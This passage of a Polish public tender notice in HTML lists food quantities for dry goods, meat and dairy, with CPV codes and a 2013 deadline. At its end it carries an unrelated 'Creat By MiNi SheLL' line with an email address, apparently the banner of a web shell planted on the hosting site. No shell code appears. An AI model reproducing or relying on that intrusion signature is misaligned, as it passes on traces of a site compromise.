<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> artykuły spożywcze sypkie, koncentraty, przyprawy i desery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier	kg	350
Mąka pszenna 1kg	kg	200
Kasza jęczmienna 1kg	kg	90
Kasza gryczana 1kg	kg	90
Kasza manna 1kg	kg	30
Ryż 1kg	kg	200
Makarony /różne kształty/	kg	180
Płatki kukurydziane	kg	30
Płatki śniadaniowe
 /różne smaki/	kg	25
Płatki owsiane	kg	20
Dżem wysokosłodzony  /różne smaki/ 270g	szt.	60
Marmolada wieloowocowa 500g	szt.	80
Powidła śliwkowe 500g	szt.	20
Groszek konserwowy 400 g	szt.	30
Keczup 500g	szt.	50
Koncentrat pomidorowy  30% 200g	szt.	110
Koncentrat pomidorowy 30%
850g	szt.	30
Syrop owocowy 430ml	szt.	30
Kukurydza 400g	szt.	40
Majonez 700ml	szt.	70
Majonez 260g	szt.	60
Ogórki konserwowe0,9l	szt.	35
Papryka konserwowa0,9l	szt.	50
Sałatka warzywna0,9l	szt.	50
Szczaw konserwowy0,9l	szt.	10
Fasola konserwowa 400g	szt.	20
Herbata ekspresowa 28g	szt.	200
Kakao 100 % - 200 g	szt.	40
Kawa Inka 150 g	szt.	60
Pasztet drobiowy 160g	szt.	150
Sałatka z makreli 300g	szt.	100
Mąka ziemniaczana	kg	30
Sól jodowana	kg	110
Olej uniwersalny 1l	szt	100
Frytura do smażenia	kg	40
 Margaryna  zwykła 250g	szt.	30
Sos sojowy 240g	szt.	15
Chrzan tarty 270g	szt.	50
Papryka mielona słodka, ostra 20g	szt.	140
Pieprz naturalny mielony 20g	szt.	100
Przyprawa do kurczaka 	kg	4
Przyprawa do ryb	kg	2
Przyprawa do mięsa wieprzowego	kg	4
Proszek do pieczenia 20 g	szt.	15
Ziele angielskie 20g	szt.	40
Kwasek cytrynowy 20g	szt.	50
Rosół drobiowy w kostce 120g	szt.	50
Musztarda 180g	szt	25
Cukier waniliowy 20g	szt	20
Cynamon 20g	szt.	15
 Galaretki owocowe 90g	szt.	20
Czosnek granulowany 20g	szt.	180
Liść laurowy 6g	szt.	30
Majeranek 150g	szt.	10
Kisiel bez cukru 40g	szt.	30
Ciastka różne	kg	10
Cukierki owocowe	kg	10
Cukierki czekoladowe	kg	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> mięso świeże, wędliny i drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I Mięso świeże
Szynka wieprzowa b/k	kg	15
Karkówka wieprzowa b/k	kg	70
Schab wieprzowy b/k	kg	100
Łopatka wieprzowa b/k, b/s	kg	530
Wołowina extra	kg	60
Żeberka wieprzowe	kg	65
Biodrówka	kg	20
Wątroba wieprzowa	kg	30
II Wędliny świeże
Blok z indyka	kg	30
Baleron z indyka	kg	10
Kiełbasa piwna	kg	38
Kiełbasa śląska	kg	28
Kiełbasa szynkowa	kg	40
Kiełbasa krakowska parzona	kg	30
Kiełbasa żywiecka	kg	60
Mielonka drobiowa	kg	12
Parówki śląskie	kg	90
Pasztetowa	kg	30
Pieczeń rzymska	kg	40
Polędwica z warzywami	kg	60
Szynka wieprzowa prasowana	kg	30
Szynka wieprzowa	kg	35
Kaszanka	kg	40
Polędwica drobiowa	kg	22
Kiełbasa zwyczajna	kg	20
Pieczeń drobiowa	kg	10
Boczek parzony	kg	20
Kiełbasa biała	kg	10
Baton szynkowy drobiowy	kg	20
                         III Mięso drobiowe świeże
Kurczak	kg	80
Filet z kurczaka surowy	kg	160
Udka z kurczaka	kg	120
Wątróbka drobiowa	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> mleko i produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt owocowy 120g szt.	2100
Jogurt naturalny 370.	szt.	50
Jogurt owocowy 300g	szt.	150
Masło śmietankowe 82 proc. kostka 200g	kg	200
Mleko 2 proc. świeże	l.	1000
Mleko UHT 2 proc.	l.	900
Serki topione miks krążek 140g	szt.	180
Serek topiony  kiełbaski  100 g	szt.	100
Ser żółty gouda/edamski	kg	100
Śmietana 18 proc. 400g	szt.	580
Twaróg półtusty	kg	70
Serek waniliowy  w wiaderku	kg	90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com